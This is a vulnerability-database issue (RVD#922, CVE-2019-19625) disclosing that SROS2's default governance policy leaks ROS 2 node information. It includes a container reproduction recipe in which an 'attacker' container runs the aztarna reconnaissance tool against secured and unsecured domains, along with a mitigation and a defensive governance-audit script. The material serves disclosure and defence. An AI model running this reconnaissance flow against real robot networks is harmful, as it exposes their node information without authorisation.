
RVD#922: SROS2 leaks node information #922

Open
vmayoral opened this issue Dec 5, 2019 · 2 comments
Labels
components software Vulnerabilities in purely software robot components (e.g. the ROS navigation stack) exposure package: sros2 robot component: ROS2 severity: medium 4.0 - 6.9 version: dashing ROS 2 Dashing Diademata version: eloquent ROS 2 Eloquent Elusor vulnerability

Comments

@vmayoral
Member

vmayoral commented Dec 5, 2019

cve: CVE-2019-19625
cwe: CWE-200 (Information Exposure)
description: We found that SROS 2, the tools to generate and distribute keys for ROS
  2 and use the underlying security plugins of DDS from ROS 2 leak node information
  due to a leaky default configuration as indicated at https://github.com/ros2/sros2/blob/master/sros2/sros2/policy/defaults/dds/governance.xml#L13.
  This exposure was first raised in the Security Workshop of ROSCon 2019 (Nov. 2019).
  Further debugging the flaw indicates that there might be some additional underlying
  issues.
exploitation:
  description: A simple use of ros2cli allows to exploit this flaw. See https://asciinema.org/a/SSnSAMlOEoHfqhAuzC1R98STF
    for a walkthrough.
  exploitation-image: Not available
  exploitation-vector: Not available
  exploitation-recipe:
    networks:
      - network:
        - driver: overlay
        - name: net1
        - encryption: true
        - subnet: 12.0.0.0/24

      - network:
        - driver: overlay
        - name: net2
        - encryption: false
        - subnet: 13.0.0.0/24

    containers:
      - container:
        - name: subject1
        - modules:
             - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
             - network: net1
      - container:
        - name: subject2
        - modules:
             - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
             - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/deve_atom
             - network: net1
      - container:
        - name: attacker
        - modules:
             - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
             - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/reco_aztarna
             - network:
                - net1
                - net2

    flow:
      - container:
        - name: subject1
        - window:
            - name: unsecure
            - commands:
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "export ROS_DOMAIN_ID=0"
              - command: "ros2 run demo_nodes_cpp talker"
              - split: horizontal
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "export ROS_DOMAIN_ID=0"
              - command: "env | grep ROS"  # this shows there's no security enabled at this point
        - select: unsecure
      - container:
        - name: subject2
        - window:
            - name: secure
            - commands:
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "export ROS_DOMAIN_ID=1"
              - command: "env | grep ROS"  # this shows there's no security enabled at this point
              - command: "ros2 run demo_nodes_cpp talker"
              - command: "export ROS_SECURITY_ENABLE=true"
              - command: "export ROS_SECURITY_STRATEGY=Enforce"
              - command: "export ROS_SECURITY_ROOT_DIRECTORY=/opt/ros2_ws/keystore"
              - command: "export ROS_SECURITY_LOOKUP_TYPE=MATCH_PREFIX"
              - command: "env | grep ROS"  # from this point on, there's security enabled
              - command: "ros2 run demo_nodes_cpp talker"
              - split: horizontal
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "export ROS_DOMAIN_ID=1"
              - command: "cd /opt/ros2_ws/"
              - command: "mkdir policy"
              # generate a security policy based on our current graph
              - command: "ros2 security generate_policy policy/my_policy.xml"
              - command: "cat policy/my_policy.xml"
              # populate the keystore for all profiles
              - command: "ros2 security generate_artifacts -k keystore -p policy/my_policy.xml -n /_ros2cli"
              - command: "kill -9 $(pidof talker)"
        - select: secure
      - container:
        - name: attacker
        - window:
            - name: attacker_window
            - commands:
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "aztarna -t ros2 -d 0 --daemon -e"
              - split: horizontal
              - command: "source /opt/ros2_ws/install/setup.bash"
              - type: "aztarna -t ros2 -d 1 --daemon -e"
        - select: attacker_window
      - attach: subject2
flaw:
  application: any ROS 2 node communicating
  architectural-location: platform code
  date-detected: null
  date-reported: '2019-12-06'
  detected-by: Victor Mayoral Vilches and Lander Usategui San Juan (Alias Robotics)
  detected-by-method: runtime detection
  issue: https://github.com/aliasrobotics/RVD/issues/922
  languages: Python
  package: sros2
  phase: runtime-operation
  reported-by: Victor Mayoral Vilches and Lander Usategui San Juan (Alias Robotics)
  reported-by-relationship: security researcher
  reproducibility: always
  reproduction: https://asciinema.org/a/SSnSAMlOEoHfqhAuzC1R98STF
  reproduction-image: Not available
  specificity: ROS-specific
  subsystem: cognition:middleware
  trace: N/A
id: 922
keywords:
- Robot Operating System 2
- ROS 2
- eloquent
- dashing
links:
- https://ros-swg.github.io/ROSCon19_Security_Workshop/
- https://github.com/ros-swg/turtlebot3_demo
- https://github.com/ros2/sros2/blob/master/sros2/sros2/policy/defaults/dds/governance.xml#L13
- https://design.ros2.org/articles/ros2_dds_security.html
- https://asciinema.org/a/SSnSAMlOEoHfqhAuzC1R98STF
mitigation:
  date-mitigation: null
  description: Modify the policy and set rtps_protection_kind to ENCRYPT
  pull-request: https://github.com/ros2/sros2/pull/171
severity:
  cvss-score: 7.5
  cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  rvss-score: 6.5
  rvss-vector: RVSS:1.0/AV:AN/AC:L/PR:N/UI:N/Y:Z/S:U/C:H/I:N/A:N/H:N
  severity-description: high
system: ros2
title: 'RVD#922: SROS2 leaks node information'
type: exposure
vendor: ''
@vmayoral vmayoral added exposure robot component: ROS2 vulnerability components software Vulnerabilities in purely software robot components (e.g. a the ROS navigation stack) severity: high 7.0 - 8.9 package: sros2 version: dashing ROS 2 Dashing Diademata version: eloquent ROS 2 Eloquent Elusor labels Dec 5, 2019
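A defender-side check for the mitigation named in the ticket (set rtps_protection_kind to ENCRYPT), as an added example that is not part of this issue or of sros2: it parses a DDS Security governance file and reports every protection kind that is weaker than ENCRYPT. Both governance documents below are constructed samples following the OMG DDS Security governance schema, not the sros2 default file itself.

```python
"""Audit an SROS2/DDS Security governance.xml for protection kinds weaker than ENCRYPT.
Added example (not sros2 code); element names follow the OMG DDS Security governance schema."""
import xml.etree.ElementTree as ET

# Constructed sample modelled on the leaky default the ticket points at: rtps_protection_kind
# is SIGN, so RTPS traffic (and the node metadata it carries) is authenticated but readable.
LEAKY_GOVERNANCE = """<dds>
  <domain_access_rules>
    <domain_rule>
      <domains><id_range><min>0</min><max>230</max></id_range></domains>
      <allow_unauthenticated_participants>false</allow_unauthenticated_participants>
      <discovery_protection_kind>ENCRYPT</discovery_protection_kind>
      <liveliness_protection_kind>ENCRYPT</liveliness_protection_kind>
      <rtps_protection_kind>SIGN</rtps_protection_kind>
      <topic_access_rules>
        <topic_rule>
          <topic_expression>*</topic_expression>
          <metadata_protection_kind>ENCRYPT</metadata_protection_kind>
          <data_protection_kind>ENCRYPT</data_protection_kind>
        </topic_rule>
      </topic_access_rules>
    </domain_rule>
  </domain_access_rules>
</dds>"""

# The ticket's mitigation: the same policy with rtps_protection_kind set to ENCRYPT.
FIXED_GOVERNANCE = LEAKY_GOVERNANCE.replace(
    "<rtps_protection_kind>SIGN</rtps_protection_kind>",
    "<rtps_protection_kind>ENCRYPT</rtps_protection_kind>")

DOMAIN_KINDS = ("discovery_protection_kind", "liveliness_protection_kind", "rtps_protection_kind")
TOPIC_KINDS = ("metadata_protection_kind", "data_protection_kind")


def audit_governance(xml_text):
    """Return (location, element, value) for every protection kind that is not ENCRYPT.
    An absent element is reported with the value MISSING so it gets reviewed too."""
    findings = []
    for i, rule in enumerate(ET.fromstring(xml_text).iter("domain_rule")):
        for tag in DOMAIN_KINDS:
            value = (rule.findtext(tag) or "MISSING").strip()
            if value != "ENCRYPT":
                findings.append((f"domain_rule[{i}]", tag, value))
        for j, topic in enumerate(rule.iter("topic_rule")):
            where = f"domain_rule[{i}]/topic_rule[{j}] ({topic.findtext('topic_expression', '?')})"
            for tag in TOPIC_KINDS:
                value = (topic.findtext(tag) or "MISSING").strip()
                if value != "ENCRYPT":
                    findings.append((where, tag, value))
    return findings
```

Run audit_governance over the governance file in your keystore (for example with open(path).read()) and treat a non-empty result as a policy to revise; on the samples above the leaky document yields exactly the rtps_protection_kind/SIGN finding and the fixed one yields none.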
@vmayoral
Member Author

vmayoral commented Dec 6, 2019

Ticket updated, PR added.

@vmayoral vmayoral added severity: medium 4.0 - 6.9 and removed severity: high 7.0 - 8.9 labels Dec 6, 2019
@rvd-bot rvd-bot changed the title SROS2 leaks node information RVD#922: SROS2 leaks node information Jan 13, 2020
@vmayoral
Member Author

vmayoral commented Jun 23, 2020

alurity.yml file to reproduce sros2 leak
networks:
  - network:
    - driver: overlay
    - name: net1
    - encryption: true
    - subnet: 12.0.0.0/24

  - network:
    - driver: overlay
    - name: net2
    - encryption: false
    - subnet: 13.0.0.0/24

containers:
  - container:
    - name: subject1
    - modules:
         - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
         - network: net1
  - container:
    - name: subject2
    - modules:
         - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
         - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/deve_atom
         - network: net1
  - container:
    - name: attacker
    - modules:
         - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
         - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/reco_aztarna
         - network:
            - net1
            - net2

flow:
  - container:
    - name: subject1
    - window:
        - name: unsecure
        - commands:
          - command: "source /opt/ros2_ws/install/setup.bash"
          - command: "export ROS_DOMAIN_ID=0"
          - command: "ros2 run demo_nodes_cpp talker"
          - split: horizontal
          - command: "source /opt/ros2_ws/install/setup.bash"
          - command: "export ROS_DOMAIN_ID=0"
          - command: "env | grep ROS"  # this shows there's no security enabled at this point
    - select: unsecure
  - container:
    - name: subject2
    - window:
        - name: secure
        - commands:
          - command: "source /opt/ros2_ws/install/setup.bash"
          - command: "export ROS_DOMAIN_ID=1"
          - command: "env | grep ROS"  # this shows there's no security enabled at this point
          - command: "ros2 run demo_nodes_cpp talker"
          - command: "export ROS_SECURITY_ENABLE=true"
          - command: "export ROS_SECURITY_STRATEGY=Enforce"
          - command: "export ROS_SECURITY_ROOT_DIRECTORY=/opt/ros2_ws/keystore"
          - command: "export ROS_SECURITY_LOOKUP_TYPE=MATCH_PREFIX"
          - command: "env | grep ROS"  # from this point on, there's security enabled
          - command: "ros2 run demo_nodes_cpp talker"
          - split: horizontal
          - command: "source /opt/ros2_ws/install/setup.bash"
          - command: "export ROS_DOMAIN_ID=1"
          - command: "cd /opt/ros2_ws/"
          - command: "mkdir policy"
          # generate a security policy based on our current graph
          - command: "ros2 security generate_policy policy/my_policy.xml"
          - command: "cat policy/my_policy.xml"
          # populate the keystore for all profiles
          - command: "ros2 security generate_artifacts -k keystore -p policy/my_policy.xml -n /_ros2cli"
          - command: "kill -9 $(pidof talker)"
    - select: secure
  - container:
    - name: attacker
    - window:
        - name: attacker_window
        - commands:
          - command: "source /opt/ros2_ws/install/setup.bash"
          - command: "aztarna -t ros2 -d 0 --daemon -e"
          - split: horizontal
          - command: "source /opt/ros2_ws/install/setup.bash"
          - type: "aztarna -t ros2 -d 1 --daemon -e"
    - select: attacker_window
  - attach: subject2
